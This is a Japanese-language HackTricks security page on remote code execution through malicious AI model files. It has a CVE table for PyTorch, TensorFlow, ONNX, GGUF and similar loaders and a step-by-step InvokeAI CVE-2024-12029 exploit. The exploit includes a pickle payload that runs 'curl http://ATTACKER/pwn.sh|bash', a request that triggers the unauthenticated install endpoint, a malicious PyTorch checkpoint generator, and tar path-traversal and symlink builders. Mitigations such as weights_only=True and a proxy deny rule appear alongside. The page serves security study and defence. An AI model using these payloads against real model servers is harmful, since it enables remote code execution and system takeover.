hacktricks/src/AI/AI-Models-RCE.md

13 KiB
Raw Blame History

Models RCE

{{#include ../banners/hacktricks-training.md}}

Loading models to RCE

機械学習モデルは通常、ONNX、TensorFlow、PyTorchなどの異なる形式で共有されます。これらのモデルは、開発者のマシンや本番システムにロードされて使用されます。通常、モデルには悪意のあるコードが含まれていないはずですが、モデルのロードライブラリの脆弱性や意図された機能として、モデルがシステム上で任意のコードを実行するために使用される場合があります。

執筆時点でのこの種の脆弱性のいくつかの例は次のとおりです:

Framework / Tool Vulnerability (CVE if available) RCE Vector References
PyTorch (Python) Insecure deserialization in torch.load (CVE-2025-32434) モデルチェックポイント内の悪意のあるピクルがコード実行を引き起こす(weights_onlyの保護をバイパス)
PyTorch TorchServe ShellTorch CVE-2023-43654, CVE-2022-1471 SSRF + 悪意のあるモデルダウンロードがコード実行を引き起こす; 管理APIにおけるJavaデシリアライズRCE
TensorFlow/Keras CVE-2021-37678 (unsafe YAML)
CVE-2024-3660 (Keras Lambda)
YAMLからモデルをロードするとyaml.unsafe_loadを使用(コード実行)
Lambdaレイヤーを使用したモデルのロードが任意のPythonコードを実行
TensorFlow (TFLite) CVE-2022-23559 (TFLite parsing) 作成された.tfliteモデルが整数オーバーフローを引き起こし→ヒープ破損潜在的RCE
Scikit-learn (Python) CVE-2020-13092 (joblib/pickle) joblib.loadを介してモデルをロードすると、攻撃者の__reduce__ペイロードを持つピクルが実行される
NumPy (Python) CVE-2019-6446 (unsafe np.load) disputed numpy.loadのデフォルトがピクルオブジェクト配列を許可 悪意のある.npy/.npzがコード実行を引き起こす
ONNX / ONNX Runtime CVE-2022-25882 (dir traversal)
CVE-2024-5187 (tar traversal)
ONNXモデルの外部ウェイトパスがディレクトリを脱出できる任意のファイルを読み取る
悪意のあるONNXモデルtarが任意のファイルを上書きできるRCEにつながる
ONNX Runtime (design risk) (No CVE) ONNX custom ops / control flow カスタムオペレーターを持つモデルは攻撃者のネイティブコードをロードする必要がある; 複雑なモデルグラフが論理を悪用して意図しない計算を実行する
NVIDIA Triton Server CVE-2023-31036 (path traversal) --model-controlが有効なモデルロードAPIを使用すると、相対パスのトラバーサルが可能になり、ファイルを書き込むことができる.bashrcを上書きしてRCE
GGML (GGUF format) CVE-2024-25664 … 25668 (multiple heap overflows) 形式が不正なGGUFモデルファイルがパーサー内でヒープバッファオーバーフローを引き起こし、被害者システムでの任意のコード実行を可能にする
Keras (older formats) (No new CVE) Legacy Keras H5 model 悪意のあるHDF5.h5モデルがLambdaレイヤーコードを持ち、ロード時に実行されるKerasのsafe_modeは古い形式をカバーしていない “ダウングレード攻撃”)
Others (general) Design flaw Pickle serialization 多くのMLツールピクルベースのモデル形式、Python pickle.load)は、緩和策がない限り、モデルファイルに埋め込まれた任意のコードを実行します

さらに、PyTorchで使用されるようなPythonピクルベースのモデルは、weights_only=Trueでロードされない場合、システム上で任意のコードを実行するために使用される可能性があります。したがって、テーブルにリストされていない場合でも、すべてのピクルベースのモデルはこの種の攻撃に特に脆弱である可能性があります。

🆕 InvokeAI RCE via torch.load (CVE-2024-12029)

InvokeAIはStable-Diffusionのための人気のあるオープンソースのWebインターフェースです。バージョン5.3.1 5.4.2は、ユーザーが任意のURLからモデルをダウンロードしてロードできるRESTエンドポイント/api/v2/models/installを公開しています。

内部的に、このエンドポイントは最終的に次のように呼び出します:

checkpoint = torch.load(path, map_location=torch.device("meta"))

提供されたファイルが PyTorch チェックポイント (*.ckpt) の場合、torch.loadピクルデシリアライズ を実行します。コンテンツはユーザー制御の URL から直接取得されるため、攻撃者はチェックポイント内にカスタム __reduce__ メソッドを持つ悪意のあるオブジェクトを埋め込むことができます。このメソッドは デシリアライズ中 に実行され、InvokeAI サーバー上で リモートコード実行 (RCE) を引き起こします。

この脆弱性には CVE-2024-12029 (CVSS 9.8, EPSS 61.17 %) が割り当てられました。

攻撃の手順

  1. 悪意のあるチェックポイントを作成する:
# payload_gen.py
import pickle, torch, os

class Payload:
def __reduce__(self):
return (os.system, ("/bin/bash -c 'curl http://ATTACKER/pwn.sh|bash'",))

with open("payload.ckpt", "wb") as f:
pickle.dump(Payload(), f)
  1. あなたが制御するHTTPサーバーにpayload.ckptをホストします(例: http://ATTACKER/payload.ckpt)。
  2. 脆弱なエンドポイントをトリガーします(認証は不要です):
import requests

requests.post(
"http://TARGET:9090/api/v2/models/install",
params={
"source": "http://ATTACKER/payload.ckpt",  # remote model URL
"inplace": "true",                         # write inside models dir
# the dangerous default is scan=false → no AV scan
},
json={},                                         # body can be empty
timeout=5,
)
  1. InvokeAIがファイルをダウンロードすると、torch.load()が呼び出され、os.systemガジェットが実行され、攻撃者はInvokeAIプロセスのコンテキストでコード実行を得ます。

既製のエクスプロイト: Metasploit モジュール exploit/linux/http/invokeai_rce_cve_2024_12029 は全体のフローを自動化します。

条件

• InvokeAI 5.3.1-5.4.2(スキャンフラグデフォルト false/api/v2/models/install が攻撃者によって到達可能 • プロセスはシェルコマンドを実行する権限を持っている

緩和策

  • InvokeAI ≥ 5.4.3 にアップグレード パッチはデフォルトで scan=True を設定し、デシリアライズ前にマルウェアスキャンを実行します。
  • チェックポイントをプログラム的に読み込む際は torch.load(file, weights_only=True) または新しい torch.load_safe ヘルパーを使用します。
  • モデルソースのために許可リスト/署名を強制し、最小権限でサービスを実行します。

⚠️ 任意の Pythonピクルベースのフォーマット多くの .pt, .pkl, .ckpt, .pth ファイルを含む)は、信頼できないソースからデシリアライズすることが本質的に安全ではないことを忘れないでください。


リバースプロキシの背後で古いInvokeAIバージョンを実行し続ける必要がある場合のアドホックな緩和策の例:

location /api/v2/models/install {
deny all;                       # block direct Internet access
allow 10.0.0.0/8;               # only internal CI network can call it
}

悪意のあるPyTorchモデルの作成

  • モデルを作成する:
# attacker_payload.py
import torch
import os

class MaliciousPayload:
def __reduce__(self):
# This code will be executed when unpickled (e.g., on model.load_state_dict)
return (os.system, ("echo 'You have been hacked!' > /tmp/pwned.txt",))

# Create a fake model state dict with malicious content
malicious_state = {"fc.weight": MaliciousPayload()}

# Save the malicious state dict
torch.save(malicious_state, "malicious_state.pth")
  • モデルをロードする:
# victim_load.py
import torch
import torch.nn as nn

class MyModel(nn.Module):
def __init__(self):
super().__init__()
self.fc = nn.Linear(10, 1)

model = MyModel()

# ⚠️ This will trigger code execution from pickle inside the .pth file
model.load_state_dict(torch.load("malicious_state.pth", weights_only=False))

# /tmp/pwned.txt is created even if you get an error

Models to Path Traversal

このブログ記事でコメントされているように、異なるAIフレームワークで使用されるほとんどのモデルフォーマットはアーカイブに基づいており、通常は.zipです。したがって、これらのフォーマットを悪用してパス・トラバーサル攻撃を実行し、モデルがロードされているシステムから任意のファイルを読み取ることが可能かもしれません。

例えば、以下のコードを使用すると、ロードされたときに/tmpディレクトリにファイルを作成するモデルを作成できます:

import tarfile

def escape(member):
member.name = "../../tmp/hacked"     # break out of the extract dir
return member

with tarfile.open("traversal_demo.model", "w:gz") as tf:
tf.add("harmless.txt", filter=escape)

次のコードを使用すると、ロード時に/tmpディレクトリへのシンボリックリンクを作成するモデルを作成できます:

import tarfile, pathlib

TARGET  = "/tmp"        # where the payload will land
PAYLOAD = "abc/hacked"

def link_it(member):
member.type, member.linkname = tarfile.SYMTYPE, TARGET
return member

with tarfile.open("symlink_demo.model", "w:gz") as tf:
tf.add(pathlib.Path(PAYLOAD).parent, filter=link_it)
tf.add(PAYLOAD)                      # rides the symlink

参考文献

{{#include ../banners/hacktricks-training.md}}